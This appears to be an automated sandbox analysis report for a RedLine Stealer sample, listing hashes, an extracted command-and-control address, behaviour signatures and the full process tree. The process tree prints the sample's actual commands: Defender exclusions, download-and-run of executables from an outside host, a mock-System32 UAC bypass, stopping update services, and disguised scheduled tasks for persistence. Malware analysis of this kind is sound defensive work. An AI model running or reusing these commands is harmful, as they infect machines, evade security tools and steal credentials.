Analysis
-
max time kernel
120s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
06/08/2023, 07:16
Static task
static1
Behavioral task
behavioral1
Sample
737307862171267fd72a88c78c79ba14.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
737307862171267fd72a88c78c79ba14.exe
Resource
win10v2004-20230703-en
General
-
Target
737307862171267fd72a88c78c79ba14.exe
-
Size
382KB
-
MD5
737307862171267fd72a88c78c79ba14
-
SHA1
9576e06d485497f9aacb25fc6820281e50b82350
-
SHA256
8deda3f9f857a91d1d9b3f420a3d9102a091849696a8f34b91e9413fc954a82f
-
SHA512
12e9b8d7fa55d2c478988ce4cf5d9bd1ed91a36f2f76938e7edad8b540a1c3dab284b27baf68dec4c898db844d6dfc11132ec44c8c09efc8b5f0869b988fce69
-
SSDEEP
6144:tFwR799OIQPd+iXhq+RaoIPqg3oHBcw3v9IliGS16dSg:tFO7DOIQPd+iXhq+RPR9IY
Malware Config
Extracted
redline
5.42.65.101:40676
-
auth_value
f6a00275f5a6ff201d2cc7f078cd5988
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4180 created 3024 4180 dwm.exe 19 -
Blocklisted process makes network request 1 IoCs
flow pid Process 40 5044 powershell.exe -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 4 IoCs
pid Process 972 ComputerDefaults.exe 3348 sys.exe 4180 dwm.exe 4080 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 972 ComputerDefaults.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3408 sc.exe 1428 sc.exe 2900 sc.exe 3336 sc.exe 3656 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4752 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2920 tasklist.exe 1372 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1044 powershell.exe 1044 powershell.exe 4768 powershell.exe 1372 powershell.exe 4768 powershell.exe 1372 powershell.exe 3444 powershell.exe 3444 powershell.exe 5044 powershell.exe 5044 powershell.exe 3348 sys.exe 3348 sys.exe 4180 dwm.exe 4180 dwm.exe 4988 powershell.exe 4988 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3660 737307862171267fd72a88c78c79ba14.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1044 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 1372 powershell.exe Token: SeDebugPrivilege 3444 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 3348 sys.exe Token: SeDebugPrivilege 4988 powershell.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 3660 wrote to memory of 1044 3660 737307862171267fd72a88c78c79ba14.exe 81 PID 3660 wrote to memory of 1044 3660 737307862171267fd72a88c78c79ba14.exe 81 PID 3660 wrote to memory of 1372 3660 737307862171267fd72a88c78c79ba14.exe 93 PID 3660 wrote to memory of 1372 3660 737307862171267fd72a88c78c79ba14.exe 93 PID 3660 wrote to memory of 4768 3660 737307862171267fd72a88c78c79ba14.exe 92 PID 3660 wrote to memory of 4768 3660 737307862171267fd72a88c78c79ba14.exe 92 PID 3660 wrote to memory of 3444 3660 737307862171267fd72a88c78c79ba14.exe 96 PID 3660 wrote to memory of 3444 3660 737307862171267fd72a88c78c79ba14.exe 96 PID 3444 wrote to memory of 972 3444 powershell.exe 98 PID 3444 wrote to memory of 972 3444 powershell.exe 98 PID 972 wrote to memory of 5044 972 ComputerDefaults.exe 99 PID 972 wrote to memory of 5044 972 ComputerDefaults.exe 99 PID 5044 wrote to memory of 3348 5044 powershell.exe 105 PID 5044 wrote to memory of 3348 5044 powershell.exe 105 PID 5044 wrote to memory of 3348 5044 powershell.exe 105 PID 5044 wrote to memory of 4180 5044 powershell.exe 107 PID 5044 wrote to memory of 4180 5044 powershell.exe 107 PID 5044 wrote to memory of 4080 5044 powershell.exe 110 PID 5044 wrote to memory of 4080 5044 powershell.exe 110 PID 5044 wrote to memory of 4080 5044 powershell.exe 110 PID 4080 wrote to memory of 4624 4080 updater.exe 117 PID 4080 wrote to memory of 4624 4080 updater.exe 117 PID 4080 wrote to memory of 4624 4080 updater.exe 117 PID 4080 wrote to memory of 1372 4080 updater.exe 114 PID 4080 wrote to memory of 1372 4080 updater.exe 114 PID 4080 wrote to memory of 1372 4080 updater.exe 114 PID 4080 wrote to memory of 1948 4080 updater.exe 111 PID 4080 wrote to memory of 1948 4080 updater.exe 111 PID 4080 wrote to memory of 1948 4080 updater.exe 111
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3024
-
C:\Users\Admin\AppData\Local\Temp\737307862171267fd72a88c78c79ba14.exe"C:\Users\Admin\AppData\Local\Temp\737307862171267fd72a88c78c79ba14.exe"2⤵
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell New-Item '\\?\C:\Windows \System32' -ItemType Directory3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Move-Item -Path 'C:\Users\Admin\AppData\Local\Temp\ComputerDefaults.exe' -Destination '\\?\C:\Windows \System32\ComputerDefaults.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Move-Item -Path 'C:\Users\Admin\AppData\Local\Temp\profapi.dll' -Destination '\\?\C:\Windows \System32\profapi.dll'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -FilePath 'C:\Windows \System32\ComputerDefaults.exe' -Verb RunAs"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath "$env:TEMP "; Invoke-WebRequest -Uri "https://sh4590209.c.had.su/files/sys.xfx" -OutFile $env:TEMP"\sys.exe"; Start-Process -FilePath $env:TEMP"\sys.exe" -Verb RunAs; Invoke-WebRequest -Uri "https://sh4590209.c.had.su/files/dwm.xfx" -OutFile $env:TEMP"\dwm.exe"; Start-Process -FilePath $env:TEMP"\dwm.exe" -Verb RunAs; Invoke-WebRequest -Uri "https://sh4590209.c.had.su/files/updater.sfx" -OutFile $env:TEMP"\updater.exe"; Start-Process -FilePath $env:TEMP"\updater.exe" -Verb RunAs;5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Users\Admin\AppData\Local\Temp\sys.exe"C:\Users\Admin\AppData\Local\Temp\sys.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
C:\Users\Admin\AppData\Local\Temp\dwm.exe"C:\Users\Admin\AppData\Local\Temp\dwm.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4180
-
-
C:\Users\Admin\AppData\Local\Temp\updater.exe"C:\Users\Admin\AppData\Local\Temp\updater.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get UUID7⤵PID:1948
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
PID:1372
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C SCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\updater.exe /F7⤵PID:4624
-
-
C:\Windows\SysWOW64\tasklist.exe"tasklist"7⤵
- Enumerates processes with tasklist
PID:2920
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4916
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3408
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1428
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2900
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3336
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3656
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4632
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3888
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2004
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:4944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bybqeste#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:5020
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\updater.exe /F1⤵
- Creates scheduled task(s)
PID:4752
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
56.7MB
MD58812b172e27bcb0685c55b80608f9695
SHA14ccd780a8ee25a5987d0d3201bc2dc504dfd8fd2
SHA2563b6fd039bab6581efcfd2a862349e8366b5ba98157d78d8294ca28104df30a13
SHA5124856c761e14d6d397366db56be7016d4ea6030abaf20a69def018842e7025f5ddb50b9bd819187d82ef22feddd408c060f4a9e1b18e055458102c36715c34398
-
Filesize
56.7MB
MD58812b172e27bcb0685c55b80608f9695
SHA14ccd780a8ee25a5987d0d3201bc2dc504dfd8fd2
SHA2563b6fd039bab6581efcfd2a862349e8366b5ba98157d78d8294ca28104df30a13
SHA5124856c761e14d6d397366db56be7016d4ea6030abaf20a69def018842e7025f5ddb50b9bd819187d82ef22feddd408c060f4a9e1b18e055458102c36715c34398
-
Filesize
56.7MB
MD58812b172e27bcb0685c55b80608f9695
SHA14ccd780a8ee25a5987d0d3201bc2dc504dfd8fd2
SHA2563b6fd039bab6581efcfd2a862349e8366b5ba98157d78d8294ca28104df30a13
SHA5124856c761e14d6d397366db56be7016d4ea6030abaf20a69def018842e7025f5ddb50b9bd819187d82ef22feddd408c060f4a9e1b18e055458102c36715c34398
-
Filesize
230KB
MD5050ef3d85bac83445eeb3350c6b0f64c
SHA1b02b07254651748bb19df39a4a425e31722a645f
SHA256681c250701d3e04ec8a2eea90e430fc4bca987816dd9494796ee5fb2f8bd160b
SHA512c857594f7b88755dd7d1b8bb2c6aa70baf0d53e0dbce9a2b1c95e17e5f021079e3132ea693b6ad230572bd67cce8f17f88a3897295a91ef00fa2c46fdbd61430
-
Filesize
248KB
MD5449cb0cabf87880c7aa575a866695f22
SHA18ad5d038cd7de829a750f6c606f5e643c449b459
SHA256ce82a8ac8514f2efb1452518930377c17c637ab121414a8bdac917279b411808
SHA512adfd6cfb956ad3faa7877ada275371bfcb7fd5802124272707ed822b866ce690aa7a0363a0910156fae1b265c37223ff740fdd6d172c7f0c4929d9b8e690fc95
-
Filesize
248KB
MD5449cb0cabf87880c7aa575a866695f22
SHA18ad5d038cd7de829a750f6c606f5e643c449b459
SHA256ce82a8ac8514f2efb1452518930377c17c637ab121414a8bdac917279b411808
SHA512adfd6cfb956ad3faa7877ada275371bfcb7fd5802124272707ed822b866ce690aa7a0363a0910156fae1b265c37223ff740fdd6d172c7f0c4929d9b8e690fc95
-
Filesize
248KB
MD5449cb0cabf87880c7aa575a866695f22
SHA18ad5d038cd7de829a750f6c606f5e643c449b459
SHA256ce82a8ac8514f2efb1452518930377c17c637ab121414a8bdac917279b411808
SHA512adfd6cfb956ad3faa7877ada275371bfcb7fd5802124272707ed822b866ce690aa7a0363a0910156fae1b265c37223ff740fdd6d172c7f0c4929d9b8e690fc95
-
Filesize
2.1MB
MD5dd533d8860430a112cfd5de394b44023
SHA1dde8cbda172b456971fb829062dc41ef50c299c1
SHA2565d0074f852152403004efa19d36a606da74b72163f39aac34c054271bd5d00f9
SHA51213659318a174e3ab0067d4e6b88a351fe18efa1c6ef73c452985abb5ecbb540349d49d8f46389e8ae7dc564cad8270c584949f013cde7c20a0bb066ec003bc81
-
Filesize
2.1MB
MD5dd533d8860430a112cfd5de394b44023
SHA1dde8cbda172b456971fb829062dc41ef50c299c1
SHA2565d0074f852152403004efa19d36a606da74b72163f39aac34c054271bd5d00f9
SHA51213659318a174e3ab0067d4e6b88a351fe18efa1c6ef73c452985abb5ecbb540349d49d8f46389e8ae7dc564cad8270c584949f013cde7c20a0bb066ec003bc81
-
Filesize
2.1MB
MD5dd533d8860430a112cfd5de394b44023
SHA1dde8cbda172b456971fb829062dc41ef50c299c1
SHA2565d0074f852152403004efa19d36a606da74b72163f39aac34c054271bd5d00f9
SHA51213659318a174e3ab0067d4e6b88a351fe18efa1c6ef73c452985abb5ecbb540349d49d8f46389e8ae7dc564cad8270c584949f013cde7c20a0bb066ec003bc81
-
Filesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
Filesize
230KB
MD5050ef3d85bac83445eeb3350c6b0f64c
SHA1b02b07254651748bb19df39a4a425e31722a645f
SHA256681c250701d3e04ec8a2eea90e430fc4bca987816dd9494796ee5fb2f8bd160b
SHA512c857594f7b88755dd7d1b8bb2c6aa70baf0d53e0dbce9a2b1c95e17e5f021079e3132ea693b6ad230572bd67cce8f17f88a3897295a91ef00fa2c46fdbd61430